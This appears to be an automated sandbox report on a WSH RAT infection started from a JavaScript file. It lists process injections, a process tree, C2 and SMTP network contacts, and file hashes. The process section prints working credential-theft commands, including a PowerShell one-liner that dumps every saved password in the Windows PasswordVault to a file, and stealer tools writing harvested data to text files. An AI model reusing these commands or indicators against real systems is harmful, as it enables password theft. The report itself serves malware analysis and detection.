HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2176 wrote to memory of 2768 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 2176 wrote to memory of 2768 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 2176 wrote to memory of 2768 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 2768 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 2768 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 2768 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 wrote to memory of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2176 wrote to memory of 3952 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 3952 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 3776 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 3776 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3776 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 2528 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2528 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2528 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 652 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 652 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 652 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 3956 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 3956 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 1528 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 1528 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1528 wrote to memory of 3496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 4004 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 4004 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4004 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2176 wrote to memory of 1804 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 1804 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 2176 wrote to memory of 1804 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

C:\Users\Admin\AppData\Local\Temp\fthost.exe

"C:\Users\Admin\AppData\Local\Temp\fthost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 8.8.8.8:53 mail.legacypharma.com.pk udp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp

Files

C:\Users\Admin\AppData\Local\Temp\fthost.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2768-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fthost.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2768-118-0x0000000000900000-0x0000000000901000-memory.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2004-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/2004-122-0x0000000002D40000-0x0000000002D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SysInfo.txt

MD5 3c77678429c241c59376b4b284bfa90f
SHA1 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633
SHA256 d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1
SHA512 f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1

memory/1972-124-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1972-125-0x0000000000411654-mapping.dmp

memory/2004-127-0x0000000002D44000-0x0000000002D46000-memory.dmp

memory/2004-126-0x0000000002D41000-0x0000000002D42000-memory.dmp

memory/1972-128-0x0000000000400000-0x000000000041B000-memory.dmp

memory/600-129-0x0000000000400000-0x0000000000458000-memory.dmp

memory/600-130-0x0000000000442628-mapping.dmp

memory/600-131-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

memory/3952-133-0x0000000000000000-mapping.dmp

memory/3952-138-0x0000022142EE0000-0x0000022142EE2000-memory.dmp

memory/3952-139-0x0000022142EE3000-0x0000022142EE5000-memory.dmp

memory/3952-140-0x000002215B1B0000-0x000002215B1B1000-memory.dmp

memory/3952-143-0x000002215B360000-0x000002215B361000-memory.dmp

memory/3952-144-0x000002215B2F0000-0x000002215B2F1000-memory.dmp

memory/3952-151-0x000002215B3E0000-0x000002215B3E1000-memory.dmp

memory/3952-152-0x0000022142EE6000-0x0000022142EE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

memory/3776-155-0x0000000000000000-mapping.dmp

memory/1300-156-0x0000000000000000-mapping.dmp

memory/2528-157-0x0000000000000000-mapping.dmp

memory/2976-158-0x0000000000000000-mapping.dmp

memory/652-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/3956-163-0x0000000000000000-mapping.dmp

memory/1528-164-0x0000000000000000-mapping.dmp

memory/3496-165-0x0000000000000000-mapping.dmp

memory/4004-166-0x0000000000000000-mapping.dmp

memory/980-167-0x0000000000000000-mapping.dmp

memory/1804-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342